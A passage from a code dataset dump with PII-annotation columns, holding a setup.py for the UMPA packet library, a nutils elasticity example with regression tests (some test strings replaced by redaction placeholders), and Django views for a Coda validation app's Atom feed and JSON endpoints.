| 11,829 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', 'april 2012'], ['LOCATION', 'list_easy'], ['LOCATION', 'game(dificulty'], ['PERSON', 'list_values= highscores.values'], ['PERSON', 'list_values.sort'], ['DATE_TIME', '2012'], ['LOCATION', 'list_easy'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'os.ac'], ['URL', 'os.mk'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'DAT.cl'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'DAT.cl'], ['URL', 'email.com'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'DAT.cl'], ['URL', 'os.sy'], ['URL', 'highscores.ke'], ['URL', 'highscores.va'], ['URL', 'values.so'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'DAT.cl'], ['URL', 'DAT.cl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'time.sl'], ['URL', 'pygame.mixer.ge'], ['URL', 'pygame.mixer.mu'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'pygame.mixer.in'], ['URL', 'pygame.mixer.mu'], ['URL', 'song.mp'], ['URL', 'pygame.mixer.music.pl'], ['URL', 'os.sy'], ['URL', 'os.sy']] |
25 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2009 Adriano Monteiro Marques.
#
# Author: Bartosz SKOWRON <getxsick at gmail dot com>
#
# This library is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation; either version 2.1 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this library; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import glob
import os
import os.path
from stat import ST_MODE
from distutils.core import setup
from distutils.command.install import install
UMPA_VERSION = '0.2'
SHARE_DIR = os.path.join('share', 'umpa')
DOCS_DIR = os.path.join('share', 'doc', 'umpa')
TESTS_DIR = [
os.path.join('tests'),
os.path.join('tests', 'system'),
os.path.join('tests', 'system', 'test_snd'),
os.path.join('tests', 'system', 'test_sndrcv'),
os.path.join('tests', 'a_unit'),
os.path.join('tests', 'a_unit', 'test_extensions'),
os.path.join('tests', 'a_unit', 'test_protocols'),
os.path.join('tests', 'a_unit', 'test_utils'),
os.path.join('tests', 'a_unit', 'test_sniffing'),
os.path.join('tests', 'a_unit', 'test_sniffing', 'test_libpcap'),
]
class umpa_install(install):
def run(self):
install.run(self)
self.create_uninstaller()
def create_uninstaller(self):
uninstaller_filename = os.path.join(
self.install_data, SHARE_DIR, 'uninstall_umpa')
uninstaller = []
uninstaller.append(
"#!/usr/bin/env python\n"
"import os, sys, shutil\n"
"\n"
"print\n"
"print '%(line)s Uninstall UMPA %(version)s %(line)s'\n"
"print\n"
"\n"
"answer = raw_input('Are you sure that you want to '\n"
" 'completly uninstall UMPA %(version)s? (yes/no) ')\n"
"\n"
"if answer.lower() not in ['yes', 'y']:\n"
" sys.exit(0)\n"
"\n"
"print\n"
"print '%(line)s Uninstalling UMPA %(version)s... %(line)s'\n"
"print\n" % {'version': UMPA_VERSION, 'line': '-' * 10})
for output in self.get_outputs():
uninstaller.append(
'print "Removing %(output)s..."\n'
'if os.path.exists("%(output)s"):\n'
' os.remove("%(output)s")\n' % {'output': output})
uninstaller.append(
"print 'Removing uninstaller itself...'\n"
"os.remove('%s')\n" % uninstaller_filename)
uninstaller.append('print "Removing empty directories..."\n')
for dir in (
os.path.join(self.install_data, SHARE_DIR),
os.path.join(self.install_data, DOCS_DIR),
os.path.join(self.install_lib, 'umpa'),
):
uninstaller.append(
'if os.path.exists("%(dir)s"):\n'
' shutil.rmtree("%(dir)s")\n' % {'dir' : dir})
uninstaller_file = open(uninstaller_filename, 'w')
uninstaller_file.writelines(uninstaller)
uninstaller_file.close()
# Set exec bit for uninstaller
mode = ((os.stat(uninstaller_filename)[ST_MODE]) | 0555) & 07777
os.chmod(uninstaller_filename, mode)
cmdclasses = {
'install' : umpa_install,
}
test_files = []
for dir in TESTS_DIR:
test_files = test_files + [ (os.path.join(SHARE_DIR, dir),
glob.glob(os.path.join(dir,'*.py')))]
data_files = [ (os.path.join(SHARE_DIR,'examples'),
glob.glob(os.path.join('examples','*'))),
(os.path.join(DOCS_DIR,'API'),
glob.glob(os.path.join('docs','API','*'))),
(os.path.join(DOCS_DIR,'tutorials','_sources'),
glob.glob(os.path.join('docs','tutorials','_sources','*'))),
(os.path.join(DOCS_DIR,'tutorials','_static'),
glob.glob(os.path.join('docs','tutorials','_static','*'))),
(os.path.join(DOCS_DIR,'tutorials'),
glob.glob(os.path.join('docs','tutorials','*.*'))),
(SHARE_DIR, ('run_tests.sh', 'run_tests.bat')),
(DOCS_DIR,
('README', 'COPYING', 'AUTHORS', 'TODO', 'CHANGES',
'INSTALL')),
(os.path.join(SHARE_DIR, 'tests'),
(os.path.join('tests','README'),
os.path.join('tests','IMPORTANT'))),
] + test_files
setup( name = "UMPA",
version = UMPA_VERSION,
description = "Umit's Manipulations of Packets Art",
author = "Bartosz SKOWRON",
       author_email = "dummy@email.com",
url = "http://www.umpa.umitproject.org",
license = "GNU LGPLv2",
platforms = ["Platform Independent"],
packages = [ "umit",
"umit.umpa",
"umit.umpa.protocols",
"umit.umpa.sniffing",
"umit.umpa.sniffing.libpcap",
"umit.umpa.extensions",
"umit.umpa.utils",
],
data_files = data_files,
cmdclass = cmdclasses,
)
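# Usage sketch (editor's note): `python setup.py install` runs the custom
# umpa_install command above; besides the normal install it writes an
# executable uninstall_umpa script under <install_data>/share/umpa that
# removes every installed file (and finally itself) when executed.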
| 5,889 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'http://www.umpa.umitproject.org'], ['DATE_TIME', '2008-2009'], ['PERSON', 'Adriano Monteiro Marques'], ['PERSON', 'Bartosz SKOWRON'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['PERSON', 'UMPA'], ['LOCATION', 'version)s'], ['PERSON', 'UMPA'], ['LOCATION', 'version)s'], ['PERSON', 'answer.lower'], ['LOCATION', 'version)s'], ['PERSON', 'TODO'], ['PERSON', 'Umit'], ['PERSON', 'Bartosz SKOWRON'], ['URL', 'os.pa'], ['URL', 'distutils.co'], ['URL', 'distutils.command.in'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'install.ru'], ['URL', 'self.cr'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'self.ge'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'os.re'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'os.pa'], ['URL', 'file.cl'], ['URL', 'os.st'], ['URL', 'os.ch'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'tests.sh'], ['URL', 'tests.ba'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'email.com'], ['URL', 'umit.umpa.pro'], ['URL', 'umit.umpa.sn'], ['URL', 'umit.umpa.sniffing.li']] |
26 | #! /usr/bin/env python3
#
# In this script we solve the linear elasticity problem on a unit square
# domain, clamped at the left boundary, and stretched at the right boundary
# while keeping vertical displacements free.
from nutils import mesh, function, solver, export, cli, testing
def main(nelems:int, etype:str, btype:str, degree:int, poisson:float):
'''
Horizontally loaded linear elastic plate.
.. arguments::
nelems [10]
Number of elements along edge.
etype [square]
Type of elements (square/triangle/mixed).
btype [std]
Type of basis function (std/spline), with availability depending on the
configured element type.
degree [1]
Polynomial degree.
poisson [.25]
Poisson's ratio, nonnegative and strictly smaller than 1/2.
'''
domain, geom = mesh.unitsquare(nelems, etype)
ns = function.Namespace()
ns.x = geom
ns.basis = domain.basis(btype, degree=degree).vector(2)
ns.u_i = 'basis_ni ?lhs_n'
ns.X_i = 'x_i + u_i'
ns.lmbda = 2 * poisson
ns.mu = 1 - 2 * poisson
ns.strain_ij = '(d(u_i, x_j) + d(u_j, x_i)) / 2'
ns.stress_ij = 'lmbda strain_kk δ_ij + 2 mu strain_ij'
sqr = domain.boundary['left'].integral('u_k u_k J(x)' @ ns, degree=degree*2)
sqr += domain.boundary['right'].integral('(u_0 - .5)^2 J(x)' @ ns, degree=degree*2)
cons = solver.optimize('lhs', sqr, droptol=1e-15)
res = domain.integral('d(basis_ni, x_j) stress_ij J(x)' @ ns, degree=degree*2)
lhs = solver.solve_linear('lhs', res, constrain=cons)
bezier = domain.sample('bezier', 5)
X, sxy = bezier.eval(['X', 'stress_01'] @ ns, lhs=lhs)
export.triplot('shear.png', X, sxy, tri=bezier.tri, hull=bezier.hull)
return cons, lhs
# If the script is executed (as opposed to imported), :func:`nutils.cli.run`
# calls the main function with arguments provided from the command line. For
# example, to keep with the default arguments simply run :sh:`python3
# elasticity.py`. To select mixed elements and quadratic basis functions add
# :sh:`python3 elasticity.py etype=mixed degree=2`.
if __name__ == '__main__':
cli.run(main)
# Once a simulation is developed and tested, it is good practice to save a few
# strategic return values for regression testing. The :mod:`nutils.testing`
# module, which builds on the standard :mod:`unittest` framework, facilitates
# this by providing :func:`nutils.testing.TestCase.assertAlmostEqual64` for the
# embedding of desired results as compressed base64 data.
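# (editor's assumption) When a tested value changes legitimately, the failing
# assertAlmostEqual64 call reports the newly computed base64 string, which can
# then be pasted into the regression tests below.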
class test(testing.TestCase):
@testing.requires('matplotlib')
def test_default(self):
cons, lhs = main(nelems=4, etype='square', btype='std', degree=1, poisson=.25)
with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''
eNpjYMACGsiHP0wxMQBKlBdi''')
with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''
eNpjYMAEKcaiRmLGQQZCxgwMYsbrzqcYvz672KTMaIKJimG7CQPDBJM75xabdJ3NMO0xSjG1MUw0Beox
PXIuw7Tk7A/TXqMfQLEfQLEfQLEfpsVnAUzzHtI=''')
@testing.requires('matplotlib')
def test_mixed(self):
cons, lhs = main(nelems=4, etype='mixed', btype='std', degree=1, poisson=.25)
with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''
eNpjYICCBiiEsdFpIuEPU0wMAG6UF2I=''')
with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''
PI:KEY
PI:KEY''')
@testing.requires('matplotlib')
def test_quadratic(self):
cons, lhs = main(nelems=4, etype='square', btype='std', degree=2, poisson=.25)
with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''
eNpjYCACNIxc+MOUMAYA/+NOFg==''')
with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''
eNqFzLPI:KEY
PI:KEY
PI:KEY
PI:KEY
PI:KEY''')
@testing.requires('matplotlib')
def test_poisson(self):
cons, lhs = main(nelems=4, etype='square', btype='std', degree=1, poisson=.4)
with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''
eNpjYMACGsiHP0wxMQBKlBdi''')
with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''
eNpjYMAEFsaTjdcYvTFcasTAsMZI5JyFce6ZKSavjbNMFhhFmDAwZJkknJ1iInom0ZTJJNx0q1GgKQND
uKn32UTTf6d/mLKY/DDdZvQDKPbD1OvsD9M/pwGZyh9l''')
| 4,221 | [['PERSON', "ns.u_i = '"], ['PERSON', 'basis_ni'], ['PERSON', "X_i = 'x_i"], ['PERSON', 'd(u_i'], ['PERSON', 'sqr'], ['PERSON', 'sqr'], ['PERSON', "bezier = domain.sample('bezier'"], ['PERSON', "sxy = bezier.eval(['X'"], ['LOCATION', 'TestCase'], ['IP_ADDRESS', '::\n\n '], ['URL', 'function.Na'], ['URL', 'ns.ba'], ['URL', 'domain.ba'], ['URL', 'ns.mu'], ['URL', 'ns.st'], ['URL', 'ns.st'], ['URL', 'domain.bo'], ['URL', 'domain.bo'], ['URL', 'domain.int'], ['URL', 'solver.so'], ['URL', 'domain.sa'], ['URL', 'export.tr'], ['URL', 'shear.pn'], ['URL', 'bezier.tr'], ['URL', 'bezier.hu'], ['URL', 'nutils.cli.ru'], ['URL', 'elasticity.py'], ['URL', 'elasticity.py'], ['URL', 'cli.ru'], ['URL', 'nutils.testing.TestCase.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as']] |
27 | import json
import random
import datetime
from codalib import APP_AUTHOR
from codalib.bagatom import wrapAtom, makeObjectFeed
from dateutil import parser
from django.conf import settings
from django.contrib.sites.models import Site
from django.contrib.syndication.views import Feed
from django.core.paginator import Paginator
from django.http import HttpResponse, HttpResponseNotFound
from django.shortcuts import get_object_or_404, render
from django.utils.feedgenerator import Atom1Feed
from lxml import etree
from django.views.generic import ListView
from .models import Validate
XML_HEADER = b"<?xml version=\"1.0\"?>\n%s"
class CorrectMimeTypeFeed(Atom1Feed):
mime_type = 'application/xml'
class AtomNextNewsFeed(Feed):
"""
next view.
an atom pub representation of the next validation to occur.
should be a single item.
"""
feed_type = Atom1Feed
link = "/validate/next/"
title = "UNT Coda Validate App"
subtitle = "The highest priority validation item"
reason = 'None'
author_name = APP_AUTHOR.get('name', None)
author_link = APP_AUTHOR.get('uri', None)
feed_type = CorrectMimeTypeFeed
def get_object(self, request, server):
if server:
return server
else:
return None
def items(self, obj):
# need to filter by server first, if provided
reason = ''
if obj:
validations = Validate.objects.all().filter(server=obj)
            reason = ('This selection was filtered to only consider '
                      'server %s. ' % obj)
else:
validations = Validate.objects.all()
# next check if we have any with a priority above 0
v = validations.filter(
priority__gt=0).order_by('priority_change_date')
if v.exists():
            reason += ('Item was chosen because it is the '
                       'oldest prioritized.')
# if set is empty, go with any priority with last_verified older than
# settings.VALIDATION_PERIOD
else:
# It might seem natural to use django's built-in random ordering,
# but that technique becomes slow when using large sets
# because 'order by ?' is very expensive against MySQL dbs.
# v = Validate.objects.all().filter(
# last_verified__gte=datetime.datetime.now() -
# settings.VALIDATION_PERIOD
# ).order_by('?')
# instead, let's do this:
# http://elpenia.wordpress.PI:KEY
now = datetime.datetime.now()
v = validations.filter(
last_verified__lte=now - settings.VALIDATION_PERIOD
)
if v.exists():
random_slice = int(random.random() * v.count())
v = v[random_slice:]
                reason += ('Item was randomly selected and within the '
                           'past year because there is no prioritized record.')
# if that set has no objects, pick the oldest verified item.
else:
v = validations.order_by('last_verified')
                reason += ('Item was chosen because there is no '
                           'prioritized record and it had not been validated '
                           'in the longest duration of time.')
self.reason = reason
return v[:1]
def item_title(self, item):
return item.identifier
def item_description(self, item):
return self.reason
def item_link(self, item):
return '/APP/validate/%s/' % item.identifier
# for some reason, I couldn't get AtomNextFeed to work without a server.
# I don't think optional arguments are supported for class-based syndication
# feeds, so I have this workaround to make it work.
class AtomNextFeedNoServer(AtomNextNewsFeed):
def get_object(self, request):
pass
def index(request):
context = {
'recently_prioritized': Validate.objects.filter(
priority__gt=0).order_by('-priority_change_date')[:20],
'recently_verified': Validate.objects.all().order_by('-last_verified')[:20],
'verified_counts': Validate.objects.last_verified_status_counts()
}
return render(request, 'coda_validate/index.html', context)
def last_day_of_month(year, month):
""" Work out the last day of the month """
last_days = [31, 30, 29, 28, 27]
for i in last_days:
try:
end = datetime.datetime(year, month, i)
except ValueError:
continue
else:
return end.day
return None
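# Examples (editor's note): last_day_of_month(2015, 2) == 28,
# last_day_of_month(2016, 2) == 29 and last_day_of_month(2015, 12) == 31.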
def stats(request):
"""
stats page
"""
if not Validate.objects.exists():
return render(
request,
'coda_validate/stats.html',
{
'sums_by_date': {},
'validations': None,
'this_month': None,
'last_24h': None,
'last_vp': None,
'unverified': 0,
'passed': 0,
'failed': 0,
'validation_period': '%s days' % str(
settings.VALIDATION_PERIOD.days
),
}
)
# resolve the range for last month filter
today = datetime.date.today()
first = datetime.date(day=1, month=today.month, year=today.year)
last_day = last_day_of_month(first.year, first.month)
this_month_range = [
'%s-%s-01 00:00:00' % (first.year, first.month),
'%s-%s-%s 23:59:59' % (first.year, first.month, last_day),
]
# resolve the range for last 24 hours filter
now = datetime.datetime.now()
twenty_four_hours_ago = now - datetime.timedelta(hours=24)
since_validation_period = now - datetime.timedelta(
days=settings.VALIDATION_PERIOD.days)
# make a set of data that makes sense for the heatmap
result_counts = Validate.objects.last_verified_status_counts()
total = sum(result_counts.values())
sums_by_date = Validate.sums_by_date()
sums_by_date_g = {}
years = set()
for dt, ct in sums_by_date.items():
y, m, d = dt
dt = (y, m - 1, d)
sums_by_date_g[dt] = ct
years.add(y)
sums_by_date = sums_by_date_g
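    # (editor's note) the month is shifted to zero-based above presumably
    # because the front-end heatmap builds JavaScript Dates, whose months
    # run 0-11; this is an assumption inferred from the m - 1 adjustment.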
num_years = len(years)
return render(
request,
'coda_validate/stats.html',
{
'sums_by_date': dict((('%d, %d, %d' % s, c)
for s, c in sums_by_date.items())),
'num_years': num_years,
'validations': total,
'this_month': Validate.objects.filter(
last_verified__range=this_month_range).count(),
'last_24h': Validate.objects.filter(
last_verified__range=[twenty_four_hours_ago, now]).count(),
'last_vp': Validate.objects.filter(
last_verified__range=[since_validation_period, now]).count(),
'unverified': result_counts.get('Unverified'),
'passed': result_counts.get('Passed'),
'failed': result_counts.get('Failed'),
'validation_period': '%s days' % str(settings.VALIDATION_PERIOD.days),
}
)
def prioritize(request):
"""
prioritize view
"""
identifier = request.GET.get('identifier')
prioritized = False
if identifier:
v = get_object_or_404(Validate, identifier=identifier)
v.priority = 1
v.priority_change_date = datetime.datetime.now()
v.save()
prioritized = True
return render(
request,
'coda_validate/prioritize.html',
{
'identifier': identifier,
'prioritized': prioritized,
}
)
def validate(request, identifier):
"""
prioritize view
"""
# this view always gets an identifier, if it's wrong, 404
v = get_object_or_404(Validate, identifier=identifier)
# clicked priority button on validate detail page
p = request.GET.get('priority')
if p == '1':
v.priority = 1
v.priority_change_date = datetime.datetime.now()
v.save()
return render(
request,
'coda_validate/validate.html',
{
'validate': v,
}
)
def prioritize_json(request):
"""
prioritize json view
"""
DOMAIN = Site.objects.get_current().domain
identifier = request.GET.get('identifier')
json_dict = {}
json_dict['status'] = 'failure'
status = 404
if identifier:
json_dict['requested_identifier'] = identifier
try:
v = Validate.objects.get(identifier=identifier)
except Exception:
v = None
if v:
v.priority = 1
v.priority_change_date = datetime.datetime.now()
v.save()
json_dict['status'] = 'success'
json_dict['priority'] = v.priority
json_dict['priority_change_date'] = str(v.priority_change_date)
json_dict['atom_pub_url'] = '%s/APP/validate/%s' % \
(DOMAIN, v.identifier)
status = 200
else:
json_dict['response'] = 'identifier was not found'
json_dict['requested_identifier'] = identifier
else:
json_dict['response'] = 'missing identifier parameter'
json_dict['requested_identifier'] = ''
status = 400
response = HttpResponse(content_type='application/json', status=status)
json.dump(
json_dict,
fp=response,
indent=4,
sort_keys=True,
)
return response
def validateToXML(validateObject):
"""
This is the reverse of xmlToValidateObject.
Given a "Validate" object, it generates an
XML object representative of such.
"""
# define namespace
validate_namespace = "http://digital2.library.unt.edu/coda/validatexml/"
val = "{%s}" % validate_namespace
validate_nsmap = {"validate": validate_namespace}
# build xml from object and return
XML = etree.Element("{0}validate".format(val), nsmap=validate_nsmap)
label = etree.SubElement(XML, "{0}identifier".format(val))
label.text = validateObject.identifier
last_verified = etree.SubElement(XML, "{0}last_verified".format(val))
last_verified.text = validateObject.last_verified.isoformat()
last_verified_status = etree.SubElement(XML, "{0}last_verified_status".format(val))
last_verified_status.text = validateObject.last_verified_status
priority_change_date = etree.SubElement(XML, "{0}priority_change_date".format(val))
priority_change_date.text = validateObject.priority_change_date.isoformat()
priority = etree.SubElement(XML, "{0}priority".format(val))
priority.text = str(validateObject.priority)
server = etree.SubElement(XML, "{0}server".format(val))
server.text = validateObject.server
return XML
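# Shape of the generated XML (editor's sketch, illustrative values only):
#   <validate:validate xmlns:validate="http://digital2.library.unt.edu/coda/validatexml/">
#     <validate:identifier>example-identifier</validate:identifier>
#     <validate:last_verified>2015-01-01T00:00:00</validate:last_verified>
#     <validate:last_verified_status>Passed</validate:last_verified_status>
#     <validate:priority_change_date>2015-01-01T00:00:00</validate:priority_change_date>
#     <validate:priority>0</validate:priority>
#     <validate:server>example-server</validate:server>
#   </validate:validate>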
def xmlToValidateObject(validateXML):
"""
Parse the XML in a POST request and create the validate object
"""
entryRoot = etree.XML(validateXML)
if entryRoot is None:
raise ValueError("Unable to parse uploaded XML")
# parse XML
contentElement = entryRoot.xpath("*[local-name() = 'content']")[0]
validateXML = contentElement.xpath("*[local-name() = 'validate']")[0]
identifier = validateXML.xpath(
"*[local-name() = 'identifier']")[0].text.strip()
last_verified = validateXML.xpath(
"*[local-name() = 'last_verified']")[0].text.strip()
last_verified = parser.parse(last_verified)
last_verified_status = validateXML.xpath(
"*[local-name() = 'last_verified_status']")[0].text.strip()
priority_change_date = validateXML.xpath(
"*[local-name() = 'priority_change_date']")[0].text.strip()
priority_change_date = parser.parse(priority_change_date)
priority = validateXML.xpath(
"*[local-name() = 'priority']")[0].text.strip()
server = validateXML.xpath("*[local-name() = 'server']")[0].text.strip()
# make the object and return
validate = Validate(
identifier=identifier,
last_verified=last_verified,
last_verified_status=last_verified_status,
priority_change_date=priority_change_date,
priority=priority,
server=server,
)
return validate
def xmlToUpdateValidateObject(validateXML):
"""
    Parse the XML in a PUT request and adjust the validate based on that.
    Modifies 'last_verified_status', and resets 'last_verified' and 'priority'.
"""
entryRoot = etree.XML(validateXML)
if entryRoot is None:
raise ValueError("Unable to parse uploaded XML")
# parse XML
contentElement = entryRoot.xpath("*[local-name() = 'content']")[0]
validateXML = contentElement.xpath("*[local-name() = 'validate']")[0]
identifier = validateXML.xpath(
"*[local-name() = 'identifier']")[0].text.strip()
last_verified_status = validateXML.xpath(
"*[local-name() = 'last_verified_status']")[0].text.strip()
# get the object (or 404) and return to the APP view to finish up.
validate = get_object_or_404(Validate, identifier=identifier)
validate.last_verified_status = last_verified_status
validate.last_verified = datetime.datetime.now()
validate.priority = 0
validate.save()
return validate
def app_validate(request, identifier=None):
"""
This method handles the ATOMpub protocol for validate objects
"""
# are we POSTing a new identifier here?
if request.method == 'POST' and not identifier:
# to object
validateObject = xmlToValidateObject(request.body)
validateObject.save()
# and back to xml
validateObjectXML = validateToXML(validateObject)
atomXML = wrapAtom(
xml=validateObjectXML,
id='http://%s/APP/validate/%s/' % (
request.META['HTTP_HOST'], validateObject.identifier
),
title=validateObject.identifier,
)
atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)
resp = HttpResponse(atomText, content_type="application/atom+xml")
resp.status_code = 201
resp['Location'] = 'http://%s/APP/validate/%s/' % \
(request.META['HTTP_HOST'], validateObject.identifier)
elif request.method == 'HEAD':
resp = HttpResponse(content_type="application/atom+xml")
resp.status_code = 200
# if not, return a feed
elif request.method == 'GET' and not identifier:
# negotiate the details of our feed here
validates = Validate.objects.all()
page = int(request.GET['page']) if request.GET.get('page') else 1
atomFeed = makeObjectFeed(
paginator=Paginator(validates, 20),
objectToXMLFunction=validateToXML,
feedId=request.path[1:],
webRoot='http://%s' % request.META.get('HTTP_HOST'),
title="validate Entry Feed",
idAttr="identifier",
nameAttr="identifier",
dateAttr="added",
request=request,
page=page,
author={
"name": APP_AUTHOR.get('name', None),
"uri": APP_AUTHOR.get('uri', None)
},
)
atomFeedText = XML_HEADER % etree.tostring(atomFeed, pretty_print=True)
resp = HttpResponse(atomFeedText, content_type="application/atom+xml")
resp.status_code = 200
# updating an existing record
elif request.method == 'PUT' and identifier:
returnValidate = xmlToUpdateValidateObject(request.body)
validateObjectXML = validateToXML(returnValidate)
atomXML = wrapAtom(
xml=validateObjectXML,
id='http://%s/APP/validate/%s/' % (
request.META['HTTP_HOST'], identifier
),
title=identifier,
)
atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)
resp = HttpResponse(atomText, content_type="application/atom+xml")
resp.status_code = 200
elif request.method == 'GET' and identifier:
# attempt to retrieve record -- error if unable
try:
validate_object = Validate.objects.get(identifier=identifier)
except Validate.DoesNotExist:
return HttpResponseNotFound(
"There is no validate for identifier %s.\n" % identifier
)
returnValidate = validate_object
validateObjectXML = validateToXML(returnValidate)
atomXML = wrapAtom(
xml=validateObjectXML,
id='http://%s/APP/validate/%s/' % (
request.META['HTTP_HOST'], identifier
),
title=identifier,
author=APP_AUTHOR.get('name', None),
author_uri=APP_AUTHOR.get('uri', None)
)
atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)
resp = HttpResponse(atomText, content_type="application/atom+xml")
resp.status_code = 200
elif request.method == 'DELETE' and identifier:
# attempt to retrieve record -- error if unable
try:
validate_object = Validate.objects.get(identifier=identifier)
        except Validate.DoesNotExist:
return HttpResponseNotFound(
"Unable to Delete. There is no identifier %s.\n" % identifier)
# grab the validate, delete it, and inform the user.
returnValidate = validate_object
validateObjectXML = validateToXML(returnValidate)
validate_object.delete()
atomXML = wrapAtom(
xml=validateObjectXML,
id='http://%s/APP/validate/%s/' % (
request.META['HTTP_HOST'], identifier
),
title=identifier,
)
atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)
resp = HttpResponse(atomText, content_type="application/atom+xml")
resp.status_code = 200
return resp
def check_json(request):
counts = Validate.objects.last_verified_status_counts()
return HttpResponse(json.dumps(counts), content_type='application/json')
class ValidateListView(ListView):
model = Validate
template_name = 'coda_validate/list.html'
context_object_name = 'validation_list'
paginate_by = 20
def get_queryset(self):
queryset = super(ValidateListView, self).get_queryset()
status = self.request.GET.get('status')
if status:
queryset = queryset.filter(last_verified_status=status)
return queryset
| 18,335 | [['PERSON', 'codalib.bagatom'], ['URL', 'AUTHOR.ge'], ['DATE_TIME', 'past year'], ['PERSON', 'Validate.objects.last_verified_status_counts'], ['DATE_TIME', 'last_day_of_month(year, month'], ['DATE_TIME', '30'], ['DATE_TIME', '29'], ['DATE_TIME', '28'], ['DATE_TIME', "days'"], ['DATE_TIME', 'last month'], ['DATE_TIME', 'today'], ['DATE_TIME', 'month'], ['DATE_TIME', 'last_day'], ['PERSON', '00:00:00'], ['DATE_TIME', 'last 24 hours'], ['PERSON', 'Validate.objects.last_verified_status_counts'], ['LOCATION', 'sums_by_date.items'], ['PERSON', 'num_years'], ['LOCATION', 'sums_by_date.items'], ['PERSON', 'Validate.objects.filter'], ['DATE_TIME', "days'"], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'last_verified_status = etree'], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'Parse'], ['PERSON', 'Parse'], ['PERSON', 'Validate.objects.last_verified_status_counts'], ['URL', 'http://digital2.library.unt.edu/coda/validatexml/"'], ['URL', 'codalib.ba'], ['URL', 'django.co'], ['URL', 'django.contrib.sites.mo'], ['URL', 'django.contrib.syndication.vi'], ['URL', 'django.core.pa'], ['URL', 'django.ht'], ['URL', 'django.sh'], ['URL', 'django.views.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'Validate.objects.al'], ['URL', 'Validate.objects.al'], ['URL', 'validations.fi'], ['URL', 'settings.VA'], ['URL', 'Validate.objects.al'], ['URL', 'datetime.datetime.no'], ['URL', 'settings.VA'], ['URL', 'datetime.datetime.no'], ['URL', 'validations.fi'], ['URL', 'settings.VA'], ['URL', 'v.co'], ['URL', 'self.re'], ['URL', 'item.id'], ['URL', 'self.re'], ['URL', 'item.id'], ['URL', 'Validate.objects.fi'], ['URL', 'Validate.objects.al'], ['URL', 'Validate.objects.la'], ['URL', 'index.ht'], ['URL', 'stats.ht'], ['URL', 'settings.VA'], ['URL', 'datetime.date.to'], ['URL', 'today.mo'], ['URL', 'today.ye'], ['URL', 'first.ye'], ['URL', 'first.mo'], ['URL', 'first.ye'], ['URL', 'first.mo'], ['URL', 'first.ye'], ['URL', 'first.mo'], ['URL', 'datetime.datetime.no'], ['URL', 'settings.VA'], ['URL', 'Validate.objects.la'], ['URL', 'counts.va'], ['URL', 'Validate.su'], ['URL', 'date.it'], ['URL', 'years.ad'], ['URL', 'stats.ht'], ['URL', 'date.it'], ['URL', 'Validate.objects.fi'], ['URL', 'Validate.objects.fi'], 